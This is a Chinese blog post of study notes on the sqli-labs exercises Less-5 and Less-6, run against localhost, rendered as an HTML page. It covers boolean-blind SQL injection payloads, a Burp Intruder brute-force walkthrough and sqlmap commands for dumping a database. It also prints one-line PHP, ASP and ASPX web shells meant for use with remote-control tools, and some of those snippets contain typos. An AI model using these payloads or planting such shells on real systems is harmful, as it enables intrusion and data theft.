<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.15.4/css/all.min.css" integrity="sha256-mUZM63G8m73Mcidfrv5E+Y61y7a12O5mW4ezU3bxqW4=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/animate.css@3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"example.com","root":"/","images":"/images","scheme":"Pisces","darkmode":false,"version":"8.7.1","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12},"copycode":false,"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"Searching...","empty":"We didn't find any results for the search: ${query}","hits_time":"${hits} results found in ${time} ms","hits":"${hits} results found"}}</script><script src="/js/config.js"></script>
<meta name="description" content="1.注入类型sql注入形成的原因：用户被输入的非法数据被解释器执行 由注入类容区分为： 数字类型注入 字符类型注入  由提交方式分为： get注入 post注入 cookies注入 http注入  由获取信息不同分为： 基于bool的盲注，即可以根据返回页面判断条件真假的注入 基于时间的盲注，即不能根据页面返回类容判断任何信息，需要用条件语句查看时间延迟语句是否执行来判断。 基于报错注入，即页面会">
<meta property="og:type" content="article">
<meta property="og:title" content="lesson5，6总结">
<meta property="og:url" content="http://example.com/2021/10/27/less5,6/index.html">
<meta property="og:site_name" content="wds">
<meta property="og:description" content="1.注入类型sql注入形成的原因：用户被输入的非法数据被解释器执行 由注入类容区分为： 数字类型注入 字符类型注入  由提交方式分为： get注入 post注入 cookies注入 http注入  由获取信息不同分为： 基于bool的盲注，即可以根据返回页面判断条件真假的注入 基于时间的盲注，即不能根据页面返回类容判断任何信息，需要用条件语句查看时间延迟语句是否执行来判断。 基于报错注入，即页面会">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://i.loli.net/2021/10/27/oD3qw2Fr7TzHImE.png">
<meta property="og:image" content="https://i.loli.net/2021/10/27/JbPU9kNjqZc6oxG.png">
<meta property="og:image" content="https://i.loli.net/2021/10/27/xRpUOGof3X781tB.png">
<meta property="og:image" content="https://i.loli.net/2021/10/27/mKYzUd1gnE8SBFu.png">
<meta property="og:image" content="https://i.loli.net/2021/10/27/SRiKkcAfvL37Zad.png">
<meta property="og:image" content="https://i.loli.net/2021/10/27/h6IV3isf5jwgprl.png">
<meta property="article:published_time" content="2021-10-27T04:19:09.000Z">
<meta property="article:modified_time" content="2022-02-06T09:15:55.104Z">
<meta property="article:author" content="发福的小菜狗">
<meta property="article:tag" content="sql注入">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://i.loli.net/2021/10/27/oD3qw2Fr7TzHImE.png">


<link rel="canonical" href="http://example.com/2021/10/27/less5,6/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"en","comments":true,"permalink":"http://example.com/2021/10/27/less5,6/","path":"2021/10/27/less5,6/","title":"lesson5，6总结"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>lesson5，6总结 | wds</title>
  




  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
<link rel="alternate" href="/atom.xml" title="wds" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <h1 class="site-title">wds</h1>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu">
        <li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a></li>
        <li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags</a></li>
        <li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories</a></li>
        <li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a></li>
  </ul>
</nav>




</div>
        
  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>

  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#1-%E6%B3%A8%E5%85%A5%E7%B1%BB%E5%9E%8B"><span class="nav-number">1.</span> <span class="nav-text">1.注入类型</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%94%B1%E6%B3%A8%E5%85%A5%E7%B1%BB%E5%AE%B9%E5%8C%BA%E5%88%86%E4%B8%BA%EF%BC%9A"><span class="nav-number">1.1.</span> <span class="nav-text">由注入类容区分为：</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%94%B1%E6%8F%90%E4%BA%A4%E6%96%B9%E5%BC%8F%E5%88%86%E4%B8%BA%EF%BC%9A"><span class="nav-number">1.2.</span> <span class="nav-text">由提交方式分为：</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%94%B1%E8%8E%B7%E5%8F%96%E4%BF%A1%E6%81%AF%E4%B8%8D%E5%90%8C%E5%88%86%E4%B8%BA%EF%BC%9A"><span class="nav-number">1.3.</span> <span class="nav-text">由获取信息不同分为：</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%BA%8C%E5%88%86%E6%B3%95"><span class="nav-number">2.</span> <span class="nav-text">二分法</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#burpsuite%E7%88%86%E7%A0%B4"><span class="nav-number">3.</span> <span class="nav-text">burpsuite爆破</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#sqlmap%E5%BA%94%E7%94%A8"><span class="nav-number">4.</span> <span class="nav-text">sqlmap应用</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%93%88%E5%93%88%EF%BC%81%E6%97%B6%E4%BB%A3%E5%8F%98%E5%95%A6%EF%BC%81"><span class="nav-number">4.1.</span> <span class="nav-text">哈哈！时代变啦！</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E8%A1%A5%E5%85%85%E5%9F%BA%E6%9C%AC%E7%9F%A5%E8%AF%86"><span class="nav-number">5.</span> <span class="nav-text">补充基本知识</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author site-overview-item animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">发福的小菜狗</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap site-overview-item animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">30</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">7</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">5</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>



        </div>
      </div>
    </div>
  </aside>
  <div class="sidebar-dimmer"></div>


    </header>

    
  <div class="back-to-top" role="button" aria-label="Back to top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="en">
    <link itemprop="mainEntityOfPage" href="http://example.com/2021/10/27/less5,6/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="发福的小菜狗">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="wds">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          lesson5，6总结
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">Posted on</span>

      <time title="Created: 2021-10-27 12:19:09" itemprop="dateCreated datePublished" datetime="2021-10-27T12:19:09+08:00">2021-10-27</time>
    </span>
      <span class="post-meta-item">
        <span class="post-meta-item-icon">
          <i class="far fa-calendar-check"></i>
        </span>
        <span class="post-meta-item-text">Edited on</span>
        <time title="Modified: 2022-02-06 17:15:55" itemprop="dateModified" datetime="2022-02-06T17:15:55+08:00">2022-02-06</time>
      </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">In</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/sql%E6%B3%A8%E5%85%A5/" itemprop="url" rel="index"><span itemprop="name">sql注入</span></a>
        </span>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <h1 id="1-注入类型"><a href="#1-注入类型" class="headerlink" title="1.注入类型"></a>1.注入类型</h1><p><strong>sql注入形成的原因：用户被输入的非法数据被解释器执行</strong></p>
<h2 id="由注入类容区分为："><a href="#由注入类容区分为：" class="headerlink" title="由注入类容区分为："></a>由注入类容区分为：</h2><ol>
<li>数字类型注入</li>
<li>字符类型注入</li>
</ol>
<h2 id="由提交方式分为："><a href="#由提交方式分为：" class="headerlink" title="由提交方式分为："></a>由提交方式分为：</h2><ol>
<li>get注入</li>
<li>post注入</li>
<li>cookies注入</li>
<li>http注入</li>
</ol>
<h2 id="由获取信息不同分为："><a href="#由获取信息不同分为：" class="headerlink" title="由获取信息不同分为："></a>由获取信息不同分为：</h2><ol>
<li>基于bool的盲注，即可以根据返回页面判断条件真假的注入</li>
<li>基于时间的盲注，即不能根据页面返回类容判断任何信息，需要用条件语句查看时间延迟语句是否执行来判断。</li>
<li>基于报错注入，即页面会返回错误信息，或者把注入的语句的结果直接放回在页面中。</li>
</ol>
<hr>
<hr>
<p>很明显less1-4都是基于页面返回错误信息的报错注入，而从less5开始接触基于返回页面判断语句真假的bool注入</p>
<p><img src="https://i.loli.net/2021/10/27/oD3qw2Fr7TzHImE.png" alt="QQ截图20211027124159.png"></p>
<p>同样的用?id=1’ –+来判断注入</p>
<p>用?id=1’ order by 3–+来判断列数</p>
<p>但是无法用union select 来输出我们想要的内容</p>
<p>而是需要运用到 left（a,b）来<del>（推测）</del>暴力破解出它的表名，列名，库名甚至是字段</p>
<p>先演示，用?id=1’ and left((database()),1)=’a’ –+</p>
<p><img src="https://i.loli.net/2021/10/27/JbPU9kNjqZc6oxG.png" alt="QQ截图20211027125618.png"></p>
<p>以此类推直到查到库名的第一个字符是’s’</p>
<p><img src="https://i.loli.net/2021/10/27/xRpUOGof3X781tB.png" alt="QQ截图20211027125834.png"></p>
<p>然后再爆破库名第二个字符</p>
<p>直到我们把库名，表名，列名还有字段都爆破出来。</p>
<p>想到这头皮发麻，那么有没有更简单的方法呢？有！</p>
<hr>
<h1 id="二分法"><a href="#二分法" class="headerlink" title="二分法"></a>二分法</h1><p>利用ascii()来将返回的字母转换成数字(整型)，</p>
<p>?id=1’ and ascii(substr((database()),1,1))&gt;110–+来减少执行语句的优化。</p>
<p>一般般。</p>
<hr>
<h1 id="burpsuite爆破"><a href="#burpsuite爆破" class="headerlink" title="burpsuite爆破"></a>burpsuite爆破</h1><p>用burpsuite挂代理（proxy）</p>
<p><img src="https://i.loli.net/2021/10/27/mKYzUd1gnE8SBFu.png" alt="QQ截图20211027130429.png"></p>
<p>然后把请求发给instruder</p>
<p><img src="https://i.loli.net/2021/10/27/SRiKkcAfvL37Zad.png" alt="QQ截图20211027130503.png"></p>
<p>对left((database()),1)=’’ 引号里面 add$,单参数</p>
<p>调整sniper的攻击模式，调整字典为“abcdefghijklmnopqrstuvwxyz”</p>
<p>然后start attack，开始爆破</p>
<p><img src="https://i.loli.net/2021/10/27/h6IV3isf5jwgprl.png" alt="QQ截图20211027132122.png"></p>
<p>然后字长不一样的就是正确的</p>
<p>这样省了我们改字母的时间但是无法明确的给出库名还是得一个一试然后拼凑在一起。</p>
<p>那么还有更简便的方法吗？有</p>
<hr>
<h1 id="sqlmap应用"><a href="#sqlmap应用" class="headerlink" title="sqlmap应用"></a>sqlmap应用</h1><h2 id="哈哈！时代变啦！"><a href="#哈哈！时代变啦！" class="headerlink" title="哈哈！时代变啦！"></a>哈哈！时代变啦！</h2><p>直接cmd-&gt;py sqlmap.py  -u ‘<a target="_blank" rel="noopener" href="http://localhost/Less-5/?id=&#39;">http://localhost/Less-5/?id=&#39;</a> –dbs  爆库</p>
<p>py  sqlmap.py -u ‘<a target="_blank" rel="noopener" href="http://localhost/Less-5/?id=1&#39;">http://localhost/Less-5/?id=1&#39;</a> -D”库名” –tables 爆表</p>
<p>py sqlmap.py -u ‘<a target="_blank" rel="noopener" href="http://localhost/Less-5/?id=1&#39;">http://localhost/Less-5/?id=1&#39;</a> -D”库名” -T”表名” –columns 爆字段</p>
<p>py sqlmap.py -u ‘<a target="_blank" rel="noopener" href="http://localhost/Less-5/?id=1&#39;">http://localhost/Less-5/?id=1&#39;</a> -D”库名” -T”表名” -C”字段名” –dump  打包丢出</p>
<p>简单易懂，一步到位</p>
<p>详见“鲲鹏杯战后总结”</p>
<hr>
<h1 id="补充基本知识"><a href="#补充基本知识" class="headerlink" title="补充基本知识"></a>补充基本知识</h1><ol>
<li>一句话木马：</li>
</ol>
<p>php的</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> @<span class="keyword">eval</span>(<span class="variable">$_post</span>[<span class="string">&quot;crow&quot;</span>]);<span class="meta">?&gt;</span>  <span class="comment">//其中crow为密码</span></span><br></pre></td></tr></table></figure>
<p>asp的</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;%eval requst(crow)%&gt;</span><br></pre></td></tr></table></figure>
<p>aspx的</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;%@ page language=&quot;啥语言&quot;%&gt;&lt;%eval(Requst.Item[&quot;crow&quot;],&quot;unsafe&quot;);%&gt;</span><br></pre></td></tr></table></figure>



<p>配合 菜刀 蚁剑 食用 味道更佳</p>
<ol start="2">
<li>load_file() 读取当地文件</li>
<li>into outfile 写文件  select ‘crow666’ into outfile  ‘C:\phpstudy\text.txt’</li>
</ol>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/sql%E6%B3%A8%E5%85%A5/" rel="tag"># sql注入</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2021/10/21/%E2%80%9C%E9%B2%B2%E9%B9%8F%E6%9D%AF%E6%88%98%E5%90%8E%E6%80%BB%E7%BB%93%E2%80%9D/" rel="prev" title="“鲲鹏杯战后总结”">
                  <i class="fa fa-chevron-left"></i> “鲲鹏杯战后总结”
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2021/10/28/python%E5%AD%A6%E4%B9%A0/" rel="next" title="python学习">
                  python学习 <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">


<div class="copyright">
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">发福的小菜狗</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/pisces/" rel="noopener" target="_blank">NexT.Pisces</a>
  </div>

    </div>
  </footer>

  
  <script src="https://cdn.jsdelivr.net/npm/animejs@3.2.1/lib/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/next-boot.js"></script>

  





  





</body>
</html>
